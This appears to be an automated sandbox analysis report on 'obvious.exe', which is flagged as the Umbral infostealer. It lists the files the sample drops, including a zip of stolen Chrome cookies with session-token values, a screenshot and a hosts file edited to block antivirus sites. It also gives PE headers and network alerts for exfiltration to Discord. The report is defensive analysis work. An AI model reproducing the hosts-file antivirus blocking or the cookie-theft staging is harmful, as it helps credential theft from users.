                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                            Category:dropped
                            Size (bytes):49152
                            Entropy (8bit):0.8180424350137764
                            Encrypted:false
                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                            MD5:349E6EB110E34A08924D92F6B334801D
                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                            Malicious:false
                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\XztjmX3oOWYRvow

                            Download File
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                            Category:dropped
                            Size (bytes):28672
                            Entropy (8bit):2.5793180405395284
                            Encrypted:false
                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                            Malicious:false
                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1bn5izav.svr.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zs0arm0.yv4.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54lwo32v.j0g.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55rxnatn.e34.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bbe1ofz.iyz.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aug5f4cu.a1j.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gyooz3qh.iwe.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ld2h1shx.1kr.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkft2utz.wte.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovmlvudg.mq1.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4rkrywx.hjg.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5v1osxi.j4o.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\hGQwf2dJC9byEfm.ligma

                            Download File
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):674274
                            Entropy (8bit):7.997862207900495
                            Encrypted:true
                            SSDEEP:12288:1CcbecjxMqzgua2dCzcLoJpSGVN1haz4ydBSmaxRZXhfRKg6VeW8A0iLzCTXtf/Q:1N7jgiEzcLoJ5m4ydRuXhfRtA0iL2TXS
                            MD5:342CF0B721D70DA4E56B59BD3258C140
                            SHA1:74AA1CBC50F9625A00AECC1427B619FBCF48A9D6
                            SHA-256:42990A8E4A6F7F1B9E79AB72282303B5CF253875F1A08FFEDA5D0D2FB835074D
                            SHA-512:24D713A4E728A6B6A9F7FD3A6163C2AEBFDC58C42513318F79148B0272DF40111A8B116F05CAA3A755F31A2D4C0BCD21F0C24281B502013011109EA01A787AAF
                            Malicious:false
                            Preview:PK.........p.Y{..........#...Browsers\Cookies\Chrome Cookies.txt.WK....].).#..n....E/x..m.~oZ.....<..5.o..3.$Rn..,....:u..9_...}.......=s.b{.. ...$@.H.Bn2.9...x..<.....S...w].E..'.E..3.[,d....'....i......P...,t.6_Xw2n..>...Y+...sgK.q.n..l.....z...?W.t......e.y.[.'~~.d1`...m....p;h.(......yY?...<.......E.!2......{R...Z^.'.R..2o..+.yya....}.g|.....e.!.....[.R.....s.gx......Ft..].....U.@..7..e.M....~`1=.l...,ca.4..c..C2./.W....8...P<..E..I..7|^'Q......B<,...EM-.u...3......OfS...)..v..H....V9..i.AkZ........).B.n.:....J~...%).....v...v....mJ.:..X..#v...0.mP#..2.#G.,.z.c..S]E.... .......k..e06s.5.[...2x.,.pYO...,..4:..f..>.y..!.YO."...E..A"..v:..&Hr...#...g.O..x1.b.$.#.}...f.&KYD.H.,.Y..7..g-....(c..+.1"4.......~.#H...._}../. B |Z..O...HTB..P.@.-..^..`@;.......v~A.E.b......I..>..I.n.Yx\...q.....'%.".-6..?H.EB..".9?y.NU.!QR...)".h.....E..P.g........1z..2S.Ii..... .c.>#03.....JI...b@.eV..C....\.Y...E..v.....%j.^.x.l..V.{z.........f?..3Z....

                            C:\Users\user\AppData\Local\Temp\hGQwf2dJC9byEfm\Browsers\Cookies\Chrome Cookies.txt

                            Download File
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:ASCII text, with very long lines (522), with CRLF line terminators
                            Category:dropped
                            Size (bytes):3345
                            Entropy (8bit):5.8601905602672835
                            Encrypted:false
                            SSDEEP:96:jJMpoO2gFcRqFZL2L+yLstv3pPDYReynqsbCw4R2cksr:NFFRiNEUd7
                            MD5:A3E0FD5B00C49B355B00B3083DA7C5CB
                            SHA1:A809B694054810FE687456F187E5FC2C2CEFA507
                            SHA-256:592564F2EB5C54230CC985CDAB59C4AFD497EA11DC922CC72DF20172556B1354
                            SHA-512:EEB56A85B9200B40F5CBFD0CFEEA2F1E70B1C56F775EE186C5030B6E494C3F72614B8E728AF45BADA3216D74F45CD84FBAF000026A786F92235741D260C13A24
                            Malicious:false
                            Preview:.google.com.TRUE./.FALSE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.TRUE.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474...microsoft.com.TRUE./.FALSE.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f

                            C:\Users\user\AppData\Local\Temp\hGQwf2dJC9byEfm\Display\Display.png

                            Download File
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):690437
                            Entropy (8bit):7.922979908933762
                            Encrypted:false
                            SSDEEP:12288:l6n5ze89KU6mW0ZbEAeebXFKu4hmKd48GKvcN4/hyzdyeeRzZPaqxh9L:l65zqUdPhEAeebFKu4hDdkKvcN45Mdm7
                            MD5:20C566841EB0980340A1906D47492DA9
                            SHA1:FE5275290CF09F737A34D6B11BBBDB279A278E1B
                            SHA-256:4F087CB21BB174FCDFC56E7889493680CDD219591D6A19BD6FB77FFFDA7A114B
                            SHA-512:86ABBAF26D3707E77FE5FADC5D714CA50E9812D9522999589FB459B1E05407442F6B2003ED2B95A75C1C5169EAAD6207CE983DAEB9DF7095D78D0198621F585D
                            Malicious:false
                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w..Gy....;7...5......?.=.d{...r...@9.$h@d0Ad....D.."Bd1..5...P..DhE$..... ...z........[..}].UUO=U..k7...z..~...........]~........wr..K..'&.wR...?.D.g...~.\.....9a....I..=\...b.}...........1..?.i.......&b.8..H...}G0s......Xf.j..y....b.;........................E...?.......Z0.w...]w..w.9..;.....E^?....=......1s.m..[.E...Z.7.3o...7~w$.*f..;.o..3..f^...@.u..X...,.].\..y.-#Y..W}....3.......B...b.......5.>^f...Y^zc...4..w..nH..\.V....|.sX....3/........./.X...c...r].8s.i%...e9.53y~..........Z.k../.....A.v../.1.<8.q..i..*..+.g..._Sb+..&.xQ.90......N3.]...^.z.\Q..W.(....X.O...k..*.+..<...~o.....ey.....c3.y.5.a.>W....}[./.;..uy...e]l...U..}s.siW.............3....-..yI......r.....v.F.[....{..f|--1.W.ue..W.yii5Vl..y.........`...-.g.....].....=..l.K.u...].;....4....r..y3..;\....}X.K.....XK.j..f.<.S^.[....(-.!?7..)O.g..[.k..s.....>?.............,

                            C:\Windows\System32\drivers\etc\hosts

                            Download File
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:ASCII text, with CRLF, LF line terminators
                            Category:dropped
                            Size (bytes):2223
                            Entropy (8bit):4.573013811987098
                            Encrypted:false
                            SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                            MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                            SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                            SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                            SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                            Malicious:true
                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):6.052795731729376
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            • Win32 Executable (generic) a (10002005/4) 49.75%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Windows Screen Saver (13104/52) 0.07%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:obvious.exe
                            File size:235'008 bytes
                            MD5:eabe2a81aa3dabab25e49ee4b36ce075
                            SHA1:f55b6298f0a8330d90d39e20a73adb2e828dfd1c
                            SHA256:5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686
                            SHA512:9688119150d3a466d9a12bfc55933d367104747a2cf319467a78dfcf975361c9e2727f76efe380db9d0c92c39dc4b0241bfb444e965e92720c9edcf42c1d18fe
                            SSDEEP:6144:lloZM+rIkd8g+EtXHkv/iD4Wn0IZHMgPou35EwFyov28e1mpi:noZtL+EP8Wn0IZHMgPou35EwFm1
                            TLSH:A3345B1837B88F16E26F8BBDA5B0549F8771F103E94AF78E0C8895EC1411B42ED4AE57
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`................................

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0x43aa8e
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                            Entrypoint Preview

                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3aa3c0x4f.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x550.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3aa200x1c.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x38a940x38c005e71e716964900fe90b93c660b996469False0.39885049559471364data6.068602053962369IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0x3c0000x5500x600962661cf515c57234d66775c661dfadeFalse0.4134114583333333data4.575008625258809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x3e0000xc0x2007223f3255890538860641b7380927c24False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_VERSION0x3c0a00x2c4data0.4449152542372881
                            RT_MANIFEST0x3c3640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                            Imports

                            DLLImport
                            mscoree.dll_CorExeMain

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                            2024-08-27T20:06:02.729156+0200TCP2045593ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)149740443192.168.2.4162.159.136.232
                            2024-08-27T20:05:38.509069+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H34973880192.168.2.4208.95.112.1

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Aug 27, 2024 20:05:04.582629919 CEST4973180192.168.2.4208.95.112.1
                            Aug 27, 2024 20:05:04.590145111 CEST8049731208.95.112.1192.168.2.4
                            Aug 27, 2024 20:05:04.590285063 CEST4973180192.168.2.4208.95.112.1
                            Aug 27, 2024 20:05:04.590452909 CEST4973180192.168.2.4208.95.112.1
                            Aug 27, 2024 20:05:04.597310066 CEST8049731208.95.112.1192.168.2.4
                            Aug 27, 2024 20:05:05.090801001 CEST8049731208.95.112.1192.168.2.4
                            Aug 27, 2024 20:05:05.135689020 CEST4973180192.168.2.4208.95.112.1
                            Aug 27, 2024 20:05:37.829689980 CEST4973880192.168.2.4208.95.112.1
                            Aug 27, 2024 20:05:37.839713097 CEST8049738208.95.112.1192.168.2.4
